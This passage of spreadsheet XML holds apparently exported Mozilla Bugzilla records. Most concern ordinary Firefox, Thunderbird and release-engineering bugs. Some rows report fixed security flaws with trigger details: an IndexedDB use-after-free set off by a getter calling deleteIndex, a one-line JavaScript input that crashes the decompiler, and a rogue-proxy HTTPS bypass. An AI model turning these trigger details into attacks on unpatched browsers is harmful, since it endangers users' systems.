      <c r="P4769" t="inlineStr"/>
      <c r="Q4769" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4769" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4769" t="inlineStr">
        <is>
          <t>Next</t>
        </is>
      </c>
      <c r="T4769" t="n">
        <v>1</v>
      </c>
      <c r="U4769" t="n">
        <v>0</v>
      </c>
      <c r="V4769" t="n">
        <v>5</v>
      </c>
      <c r="W4769" t="inlineStr">
        <is>
          <t>For supporting editors, having information on where a AST object is in the source is vital.
I'd need this in particular for Aisle.
Nominating for 1.0, feel free to push elsewhere if you really really think think.</t>
        </is>
      </c>
      <c r="X4769" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4770">
      <c r="A4770" t="n">
        <v>1445943</v>
      </c>
      <c r="B4770" t="inlineStr">
        <is>
          <t>2018-03-15 07:01:37 -0700</t>
        </is>
      </c>
      <c r="C4770" t="inlineStr">
        <is>
          <t>Enterprise Policy support for macOS via `defaults write` and configuration profiles</t>
        </is>
      </c>
      <c r="D4770" t="inlineStr">
        <is>
          <t>2019-04-10 10:44:42 -0700</t>
        </is>
      </c>
      <c r="E4770" t="n">
        <v>1</v>
      </c>
      <c r="F4770" t="n">
        <v>1</v>
      </c>
      <c r="G4770" t="n">
        <v>2</v>
      </c>
      <c r="H4770" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4770" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4770" t="inlineStr">
        <is>
          <t>Enterprise Policies</t>
        </is>
      </c>
      <c r="K4770" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4770" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4770" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4770" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4770" t="inlineStr">
        <is>
          <t>target: 64 nightly</t>
        </is>
      </c>
      <c r="Q4770" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4770" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4770" t="inlineStr">
        <is>
          <t>Firefox 64</t>
        </is>
      </c>
      <c r="T4770" t="n">
        <v>1</v>
      </c>
      <c r="U4770" t="n">
        <v>2</v>
      </c>
      <c r="V4770" t="n">
        <v>69</v>
      </c>
      <c r="W4770" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Steps to reproduce:
Currently the only way to manage policies in the Firefox engine on macOS is to utilize CCK2. Since there was a recent implementation for GPO support on the Policy Engine in Firefox (Bug #1433136), I would like to request similar support for macOS which utilizes Configuration Profiles to manage application preferences. The way to do this is to add support for Firefox to make use of Core Foundation so that when a configuration profile is installed, the application can read the preference values that should be getting enforced. More on Core Foundation here: https://developer.apple.com/documentation/corefoundation/preferences_utilities
Commonly, preferences are written to a plist in macOS which contain the preference values that Core Foundation will read from and then set. This is not required but is the common way in which applications tend to write preferences out which could then be managed by a configuration profile.
Ideally, all the current settings that are manageable with CCK2 would be manageable with a Configuration Profile. However, even just having feature parity with GPO support on Firefox on Windows would be great.
Actual results:
Firefox currently does not store preferences in a plist and does not support Configuration Profiles to enforce preferences.
Expected results:
Firefox currently does not store preferences in a plist and does not support Configuration Profiles to enforce preferences.</t>
        </is>
      </c>
      <c r="X4770" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4771">
      <c r="A4771" t="n">
        <v>1501152</v>
      </c>
      <c r="B4771" t="inlineStr">
        <is>
          <t>2018-10-22 20:55:24 -0700</t>
        </is>
      </c>
      <c r="C4771" t="inlineStr">
        <is>
          <t>Use after free in KeyPath::ExtractKey</t>
        </is>
      </c>
      <c r="D4771" t="inlineStr">
        <is>
          <t>2024-05-30 09:49:09 -0700</t>
        </is>
      </c>
      <c r="E4771" t="n">
        <v>1</v>
      </c>
      <c r="F4771" t="n">
        <v>1</v>
      </c>
      <c r="G4771" t="n">
        <v>3</v>
      </c>
      <c r="H4771" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4771" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4771" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4771" t="inlineStr">
        <is>
          <t>65 Branch</t>
        </is>
      </c>
      <c r="L4771" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4771" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4771" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4771" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4771" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][fixed in bug 1544750][post-critsmash-triage][adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q4771" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4771" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4771" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4771" t="n">
        <v>1</v>
      </c>
      <c r="U4771" t="n">
        <v>0</v>
      </c>
      <c r="V4771" t="n">
        <v>81</v>
      </c>
      <c r="W4771" t="inlineStr">
        <is>
          <t>Created attachment 9019240
FireFox_IndexedDB_UAF3.html
nsresult
KeyPath::ExtractKey(JSContext* aCx, const JS::Value&amp; aValue, Key&amp; aKey) const
{
  uint32_t len = mStrings.Length();
  JS::Rooted&lt;JS::Value&gt; value(aCx);
  aKey.Unset();
  for (uint32_t i = 0; i &lt; len; ++i) {
    nsresult rv = GetJSValFromKeyPathString(aCx, aValue, mStrings[i],
                                            value.address(),
                                            DoNotCreateProperties, nullptr,
                                            nullptr);
    if (NS_FAILED(rv)) {
      return rv;
    }
    if (NS_FAILED(aKey.AppendItem(aCx, IsArray() &amp;&amp; i == 0, value))) { // aKey.AppendItem can execute js getter (AppendItem =&gt; EncodeJSVal =&gt;  EncodeJSValInternal =&gt; JS_GetElement)
      NS_ASSERTION(aKey.IsUnset(), "Encoding error should unset");
      return NS_ERROR_DOM_INDEXEDDB_DATA_ERR;
    }
  }
  aKey.FinishArray();
  return NS_OK;
}
aKey.AppendItem can execute js getter, call deleteIndex in the getter will cause UAF.</t>
        </is>
      </c>
      <c r="X4771" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4772">
      <c r="A4772" t="n">
        <v>468121</v>
      </c>
      <c r="B4772" t="inlineStr">
        <is>
          <t>2008-12-05 11:10:26 -0800</t>
        </is>
      </c>
      <c r="C4772" t="inlineStr">
        <is>
          <t>qm-pmac-fast01, qm-pmac02, and qm-pmac03 burning for no reason</t>
        </is>
      </c>
      <c r="D4772" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4772" t="n">
        <v>1</v>
      </c>
      <c r="F4772" t="n">
        <v>1</v>
      </c>
      <c r="G4772" t="n">
        <v>5</v>
      </c>
      <c r="H4772" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4772" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4772" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4772" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4772" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4772" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4772" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4772" t="inlineStr"/>
      <c r="Q4772" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4772" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4772" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4772" t="n">
        <v>1</v>
      </c>
      <c r="U4772" t="n">
        <v>0</v>
      </c>
      <c r="V4772" t="n">
        <v>6</v>
      </c>
      <c r="W4772" t="inlineStr">
        <is>
          <t>The following machines are failing with "FAIL: Busted: tp FAIL: browser frozen":
  MacOSX Darwin 8.8.1 talos trunk fast qm-pmac-fast01
  MacOSX Darwin 8.8.1 talos trunk qm-pmac02
  MacOSX Darwin 8.8.1 talos trunk qm-pmac03
Second time Mac Talos has had an issue this week. Note that I didn't notice them because we haven't been taking checkins on this branch while 1.9.0.5 is being worked on.</t>
        </is>
      </c>
      <c r="X4772" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4773">
      <c r="A4773" t="n">
        <v>1388932</v>
      </c>
      <c r="B4773" t="inlineStr">
        <is>
          <t>2017-08-09 17:04:53 -0700</t>
        </is>
      </c>
      <c r="C4773" t="inlineStr">
        <is>
          <t>QE needs a notification that updates are available on beta/release channel</t>
        </is>
      </c>
      <c r="D4773" t="inlineStr">
        <is>
          <t>2019-03-11 17:53:22 -0700</t>
        </is>
      </c>
      <c r="E4773" t="n">
        <v>1</v>
      </c>
      <c r="F4773" t="n">
        <v>1</v>
      </c>
      <c r="G4773" t="n">
        <v>5</v>
      </c>
      <c r="H4773" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4773" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4773" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4773" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4773" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4773" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4773" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4773" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q4773" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4773" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4773" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4773" t="n">
        <v>1</v>
      </c>
      <c r="U4773" t="n">
        <v>0</v>
      </c>
      <c r="V4773" t="n">
        <v>6</v>
      </c>
      <c r="W4773" t="inlineStr">
        <is>
          <t>We used to have an email with subject
  firefox beta 55.0 updates are available on the beta channel now &lt;EOM&gt;
and then signoffs came along, and a fix was made [1]. 
There's no notification when the scheduled change is actioned in Balrog, at least not one that reaches the r-d list that QE are monitoring. They use that to start verifying the production channel.
[1] https://github.com/mozilla-releng/releasetasks/commit/1aefa5913f6468cb789ba1429aada60fbffdab8e</t>
        </is>
      </c>
      <c r="X4773" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4774">
      <c r="A4774" t="n">
        <v>876878</v>
      </c>
      <c r="B4774" t="inlineStr">
        <is>
          <t>2013-05-28 14:12:33 -0700</t>
        </is>
      </c>
      <c r="C4774" t="inlineStr">
        <is>
          <t>crash in webrtc::videocapturemodule::GetMaxOfFrameArray</t>
        </is>
      </c>
      <c r="D4774" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:27 -0800</t>
        </is>
      </c>
      <c r="E4774" t="n">
        <v>1</v>
      </c>
      <c r="F4774" t="n">
        <v>1</v>
      </c>
      <c r="G4774" t="n">
        <v>3</v>
      </c>
      <c r="H4774" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4774" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4774" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K4774" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L4774" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4774" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4774" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4774" t="inlineStr">
        <is>
          <t>[getUserMedia], [blocking-gum-][leave-open][webrtc-topcrash][adv-main24+]</t>
        </is>
      </c>
      <c r="Q4774" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4774" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4774" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T4774" t="n">
        <v>1</v>
      </c>
      <c r="U4774" t="n">
        <v>0</v>
      </c>
      <c r="V4774" t="n">
        <v>28</v>
      </c>
      <c r="W4774" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-0a4f8b73-e624-48f2-bbf5-dc62d2130527 .
============================================================= 
Frame 	Module 	Signature 	Source
0 	xul.dll 	webrtc::videocapturemodule::GetMaxOfFrameArray 	media/webrtc/trunk/webrtc/modules/video_capture/windows/help_functions_ds.cc:26
1 	xul.dll 	webrtc::videocapturemodule::DeviceInfoDS::CreateCapabilityMap 	media/webrtc/trunk/webrtc/modules/video_capture/windows/device_info_ds.cc:609
2 	xul.dll 	webrtc::videocapturemodule::DeviceInfoImpl::NumberOfCapabilities 	media/webrtc/trunk/webrtc/modules/video_capture/device_info_impl.cc:76
3 	xul.dll 	webrtc::ViECaptureImpl::NumberOfCapabilities 	media/webrtc/trunk/webrtc/video_engine/vie_capture_impl.cc:442
4 	xul.dll 	mozilla::MediaEngineWebRTCVideoSource::ChooseCapability 	content/media/webrtc/MediaEngineWebRTCVideo.cpp:157
5 	xul.dll 	mozilla::MediaEngineWebRTCVideoSource::Allocate 	content/media/webrtc/MediaEngineWebRTCVideo.cpp:224
6 	xul.dll 	mozilla::GetUserMediaRunnable::ProcessGetUserMedia 	dom/media/MediaManager.cpp:739
7 	xul.dll 	mozilla::GetUserMediaRunnable::Run 	dom/media/MediaManager.cpp:600
8 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:627
9 	xul.dll 	nsThread::ThreadFunc 	xpcom/threads/nsThread.cpp:265
10 	nss3.dll 	_PR_NativeRunThread 	nsprpub/pr/src/threads/combined/pruthr.c:395
11 	nss3.dll 	pr_root 	nsprpub/pr/src/md/windows/w95thred.c:90
12 	msvcr100.dll 	_callthreadstartex 	f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c:314
13 	msvcr100.dll 	_threadstartex 	f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c:292
14 	kernel32.dll 	BaseThreadInitThunk 	
15 	ntdll.dll 	__RtlUserThreadStart 	
16 	ntdll.dll 	_RtlUserThreadStart</t>
        </is>
      </c>
      <c r="X4774" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4775">
      <c r="A4775" t="n">
        <v>564461</v>
      </c>
      <c r="B4775" t="inlineStr">
        <is>
          <t>2010-05-07 10:24:52 -0700</t>
        </is>
      </c>
      <c r="C4775" t="inlineStr">
        <is>
          <t>"ASSERTION: This is unsafe! Fix the caller!" and more with mutation events, XBL, contenteditable</t>
        </is>
      </c>
      <c r="D4775" t="inlineStr">
        <is>
          <t>2012-09-12 03:29:30 -0700</t>
        </is>
      </c>
      <c r="E4775" t="n">
        <v>1</v>
      </c>
      <c r="F4775" t="n">
        <v>1</v>
      </c>
      <c r="G4775" t="n">
        <v>3</v>
      </c>
      <c r="H4775" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4775" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4775" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4775" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4775" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4775" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4775" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4775" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4775" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4775" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4775" t="inlineStr">
        <is>
          <t>mozilla1.9.3a5</t>
        </is>
      </c>
      <c r="T4775" t="n">
        <v>1</v>
      </c>
      <c r="U4775" t="n">
        <v>0</v>
      </c>
      <c r="V4775" t="n">
        <v>26</v>
      </c>
      <c r="W4775" t="inlineStr">
        <is>
          <t>Created attachment 444118
testcase
Loading the testcase triggers a bunch of assertions:
###!!! ASSERTION: no frame, see bug #188946: 'frame', file editor/libeditor/base/nsEditor.cpp, line 3968
###!!! ASSERTION: recurring into frame construction: 'mPresContext-&gt;mLayoutPhaseCount[eLayoutPhase_FrameC] == 0', file layout/base/nsPresContext.h, line 1262
###!!! ASSERTION: Want to fire mutation events, but it's not safe: '(aNode-&gt;IsNodeOfType(nsINode::eCONTENT) &amp;&amp; static_cast&lt;nsIContent*&gt;(aNode)-&gt; IsInNativeAnonymousSubtree()) || sScriptBlockerCount == sRemovableScriptBlockerCount', file content/base/src/nsContentUtils.cpp, line 3392
###!!! ASSERTION: killing mutation events: 'nsContentUtils::IsSafeToRunScript()', file content/base/src/nsContentUtils.cpp, line 5941
###!!! ASSERTION: This is unsafe! Fix the caller!: 'Error', file content/events/src/nsEventDispatcher.cpp, line 514
(and then the last two assertions repeat)</t>
        </is>
      </c>
      <c r="X4775" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4776">
      <c r="A4776" t="n">
        <v>351116</v>
      </c>
      <c r="B4776" t="inlineStr">
        <is>
          <t>2006-09-01 18:13:31 -0700</t>
        </is>
      </c>
      <c r="C4776" t="inlineStr">
        <is>
          <t>Crash if formal parameter and inner function have the same name [@ js_DecompileFunction]</t>
        </is>
      </c>
      <c r="D4776" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E4776" t="n">
        <v>1</v>
      </c>
      <c r="F4776" t="n">
        <v>1</v>
      </c>
      <c r="G4776" t="n">
        <v>3</v>
      </c>
      <c r="H4776" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4776" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4776" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4776" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4776" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4776" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4776" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4776" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4776" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4776" t="inlineStr">
        <is>
          <t>mozilla1.8.1</t>
        </is>
      </c>
      <c r="T4776" t="n">
        <v>1</v>
      </c>
      <c r="U4776" t="n">
        <v>0</v>
      </c>
      <c r="V4776" t="n">
        <v>17</v>
      </c>
      <c r="W4776" t="inlineStr">
        <is>
          <t>javascript:function (s) { function s() { } }
causes a scary crash, at least in a debug build of Firefox:
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_INVALID_ADDRESS (0x0001) at 0xdadadae2
Thread 0 Crashed:
0   js_DecompileFunction + 996 (jsopcode.c:3258)
1   JS_DecompileFunction + 140 (jsapi.c:4222)
2   js_fun_toString + 2008 (jsfun.c:1476)
3   fun_toString + 68 (jsfun.c:1486)
4   js_Invoke + 4912 (jsinterp.c:1350)
5   js_InternalInvoke + 444 (jsinterp.c:1448)
6   js_TryMethod + 416 (jsobj.c:4534)
7   js_DefaultValue + 112 (jsobj.c:3809)
8   js_ValueToString + 152 (jsstr.c:2681)
9   JS_ValueToString + 40 (jsapi.c:535)
10  JSValueToAString(JSContext*, long, nsAString_internal*, int*) + 116 (nsJSEnvironment.cpp:1160)
11  nsJSContext::EvaluateString(nsAString_internal const&amp;, void*, nsIPrincipal*, char const*, unsigned, unsigned, nsAString_internal*, int*) + 1612 (nsJSEnvironment.cpp:1322)
12  nsJSThunk::EvaluateScript(nsIChannel*) + 2844 (nsJSProtocolHandler.cpp:255)</t>
        </is>
      </c>
      <c r="X4776" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4777">
      <c r="A4777" t="n">
        <v>505221</v>
      </c>
      <c r="B4777" t="inlineStr">
        <is>
          <t>2009-07-20 06:18:58 -0700</t>
        </is>
      </c>
      <c r="C4777" t="inlineStr">
        <is>
          <t>crash [@ CountTotalMimeAttachments(MimeContainer*) ]</t>
        </is>
      </c>
      <c r="D4777" t="inlineStr">
        <is>
          <t>2015-10-03 03:13:41 -0700</t>
        </is>
      </c>
      <c r="E4777" t="n">
        <v>1</v>
      </c>
      <c r="F4777" t="n">
        <v>1</v>
      </c>
      <c r="G4777" t="n">
        <v>3</v>
      </c>
      <c r="H4777" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4777" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J4777" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K4777" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L4777" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4777" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4777" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4777" t="inlineStr">
        <is>
          <t>[no l10n impact][sg:moderate] invalid read</t>
        </is>
      </c>
      <c r="Q4777" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4777" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4777" t="inlineStr">
        <is>
          <t>Thunderbird 3.0rc1</t>
        </is>
      </c>
      <c r="T4777" t="n">
        <v>1</v>
      </c>
      <c r="U4777" t="n">
        <v>0</v>
      </c>
      <c r="V4777" t="n">
        <v>62</v>
      </c>
      <c r="W4777" t="inlineStr">
        <is>
          <t>0  	thunderbird.exe  	CountTotalMimeAttachments  	mailnews/mime/src/mimemoz2.cpp:216
1 	thunderbird.exe 	CountTotalMimeAttachments 	mailnews/mime/src/mimemoz2.cpp:223
2 	thunderbird.exe 	CountTotalMimeAttachments 	mailnews/mime/src/mimemoz2.cpp:223
3 	thunderbird.exe 	MimeGetAttachmentList 	mailnews/mime/src/mimemoz2.cpp:568
4 	thunderbird.exe 	mime_display_stream_complete 	mailnews/mime/src/mimemoz2.cpp:975
5 	thunderbird.exe 	nsStreamConverter::OnStopRequest 	mailnews/mime/src/nsStreamConverter.cpp:1068
6 	thunderbird.exe 	nsMsgProtocol::OnStopRequest 	mailnews/base/util/nsMsgProtocol.cpp:393
7 	thunderbird.exe 	nsMailboxProtocol::OnStopRequest 	mailnews/local/src/nsMailboxProtocol.cpp:380
8 	thunderbird.exe 	nsInputStreamPump::OnStateStop 	netwerk/base/src/nsInputStreamPump.cpp:576
9 	thunderbird.exe 	nsInputStreamPump::OnInputStreamReady 	netwerk/base/src/nsInputStreamPump.cpp:401
10 	xpcom_core.dll 	nsInputStreamReadyEvent::Run 	xpcom/io/nsStreamUtils.cpp:111
11 	xpcom_core.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:510
12 	xpcom_core.dll 	NS_ProcessNextEvent_P 	objdir-tb/mozilla/xpcom/build/nsThreadUtils.cpp:227
13 	xpcom_core.dll 	nsThread::Shutdown 	xpcom/threads/nsThread.cpp:465
14 	thunderbird.exe 	mozStorageConnection::Close 	storage/src/mozStorageConnection.cpp:244
15 	xpcom_core.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
16 	thunderbird.exe 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2454
17 	thunderbird.exe 	XPC_WN_CallMethod 	js/src/xpconnect/src/xpcwrappednativejsops.cpp:1590</t>
        </is>
      </c>
      <c r="X4777" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4778">
      <c r="A4778" t="n">
        <v>498920</v>
      </c>
      <c r="B4778" t="inlineStr">
        <is>
          <t>2009-06-17 09:14:28 -0700</t>
        </is>
      </c>
      <c r="C4778" t="inlineStr">
        <is>
          <t>Allow tracking of people coming to inproduct help by pressing keyboard shortcut (F1)</t>
        </is>
      </c>
      <c r="D4778" t="inlineStr">
        <is>
          <t>2009-09-10 23:01:25 -0700</t>
        </is>
      </c>
      <c r="E4778" t="n">
        <v>1</v>
      </c>
      <c r="F4778" t="n">
        <v>1</v>
      </c>
      <c r="G4778" t="n">
        <v>5</v>
      </c>
      <c r="H4778" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4778" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4778" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4778" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4778" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4778" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4778" t="inlineStr">
        <is>
          <t>sumo_only</t>
        </is>
      </c>
      <c r="Q4778" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4778" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4778" t="inlineStr">
        <is>
          <t>1.3</t>
        </is>
      </c>
      <c r="T4778" t="n">
        <v>1</v>
      </c>
      <c r="U4778" t="n">
        <v>0</v>
      </c>
      <c r="V4778" t="n">
        <v>21</v>
      </c>
      <c r="W4778" t="inlineStr">
        <is>
          <t>Now that Firefox (3.5) is requesting different URLs depending on if you selected Firefox Help from the Help menu or just pressed F1 (or Cmd+Shift+? on the Mac), we would like to see how the different access points affect things like bounce rate.
We need to make sure that, for Firefox 3.5 and en-US ONLY, the inproduct traffic is sent to three unique addresses:
firefox-help   -&gt; http://support.mozilla.com/en-US/kb/Firefox+Help+1
firefox-f1     -&gt; http://support.mozilla.com/en-US/kb/Firefox+Help+2
firefox-osxkey -&gt; http://support.mozilla.com/en-US/kb/Firefox+Help+3
For other versions of Firefox, or locales, it should keep pointing to http://support.mozilla.com/%LOCALE%/kb/Firefox+Help</t>
        </is>
      </c>
      <c r="X4778" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4779">
      <c r="A4779" t="n">
        <v>796475</v>
      </c>
      <c r="B4779" t="inlineStr">
        <is>
          <t>2012-10-01 21:24:17 -0700</t>
        </is>
      </c>
      <c r="C4779" t="inlineStr">
        <is>
          <t>HTTPS can be effectively disabled by attackers on rogue networks using a proxy that returns 407 with embedded script</t>
        </is>
      </c>
      <c r="D4779" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:39 -0700</t>
        </is>
      </c>
      <c r="E4779" t="n">
        <v>1</v>
      </c>
      <c r="F4779" t="n">
        <v>1</v>
      </c>
      <c r="G4779" t="n">
        <v>3</v>
      </c>
      <c r="H4779" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4779" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4779" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4779" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L4779" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4779" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4779" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4779" t="inlineStr">
        <is>
          <t>[qa-][adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q4779" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4779" t="inlineStr">
        <is>
          <t>major</t>
